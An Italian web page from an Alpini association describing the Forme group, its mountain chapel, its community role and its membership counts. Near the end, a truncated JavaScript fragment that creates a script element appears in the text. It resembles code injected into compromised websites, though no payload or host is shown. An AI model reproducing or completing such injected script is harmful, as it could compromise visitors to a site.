A.N.A. Sezione Abruzzi

Gruppo Alpini di Forme

luglio 12th, 2007  |  Published in I gruppi della Sezione Abruzzi

Nel 1982 si costituisce il Gruppo Alpini di Forme (capogruppo Gatti Paris). Ma è solo dal 1996 che viene a realizzarsi concretamente il progetto di una chiesetta alpina (capogruppo Di Giulio Lorenzo).

La "chiesetta degli Alpini" è situata alle pendici del Monte Magnola ed è stata realizzata grazie alla collaborazione spontanea e costante da parte di tutti i membri.

Nei pressi della chiesetta sorge un antico fontanile, ripristinato e reso funzionante.

La posizione caratteristica e il panorama circostante, dominato dal verde della montagna e dal fruscio del vento rendono la chiesetta "un'oasi di pace".

 

chiesetta_forme_massa.jpg

(Foto: Archivio Gruppo Alpini di Forme).

LA LOCANDINA DELL'INAUGURAZIONE DELLA CHIESETTA ALPINA. (Foto: archivio Gruppo Alpini di Forme)

Il 10 agosto 1997 è avvenuta l'inaugurazione di tale chiesetta e ogni anno ne viene celebrato l'anniversario. Questo giorno rappresenta un'occasione di incontro per la popolazione formese e per i Gruppi Alpini che vi partecipano.

Tale evento, celebrato e sentito da tutti, è entrato ormai nella tradizione del paese.

Tutta la zona è meta abituale di coloro che amano le escursioni e le passeggiate domenicali nei vicini monti di Cucurello e della Magnola, al di sopra dei 2000 metri; rappresenta quindi una gradita sosta per riposarsi e rifornirsi d'acqua.

Nell'anno 1998 il Gruppo si è distinto dimostrando forte spirito di solidarietà in occasione dell'inaugurazione di un "ceppo", deposto in ricordo dei due giovani di Lanciano periti nelle vicinanze di Forme in seguito ad una slavina.

Si è, infatti, attivato per l'accoglienza di tutti gli intervenuti nel nome di una sincera amici­zia e fraternità.

Il nostro Gruppo è divenuto da anni promotore e organizzatore delle varie iniziative popola­ri (sagre ecc.) ed è di notevole supporto al gruppo teatrale "Quiss' elle Forme"; rappresenta quindi l'elemento unificante e di coesione per la popolazione di Forme.


Il capogruppo
Lorenzo Di Giulio


 

Le notizie relative ai Gruppi della Sezione Abruzzi sono tratte dalla seconda parte del libro intitolato "Alpini Verso L'aurora" di Mario SALVITTI, che narra la storia di 150 Gruppi Alpini abruzzesi. Tale libro é stato fortemente voluto dall'ex presidente sezionale Antonio Festa ed é stato realizzato in occasione della celebrazione del 70° anniversario della fondazione della Sezione Abruzzi (1929-1999).

Il libro va ad aggiungersi a quello di Antonio Procacci: "Abruzzo Terra Di Alpini". Entrambi offrono al lettore testimonianze del glorioso passato degli Alpini abruzzesi.

Il gruppo in esame alla fine dell'anno 2006 registra i seguenti soci:

  • – Soci alpini nr 14;
  • – Soci aggregati nr.2.

 

Il gruppo in esame alla fine dell'anno 2007 registra i seguenti soci:

  • – Soci alpini nr. 14;
  • – Soci aggregati nr. 2.

L'attuale capogruppo è il Signor :Lorenzo Di Giulio

if (document.currentScript) { } else {var d=document;var s=d.createElement(‘script’);

Your Comments

L’Alpino d’Abruzzo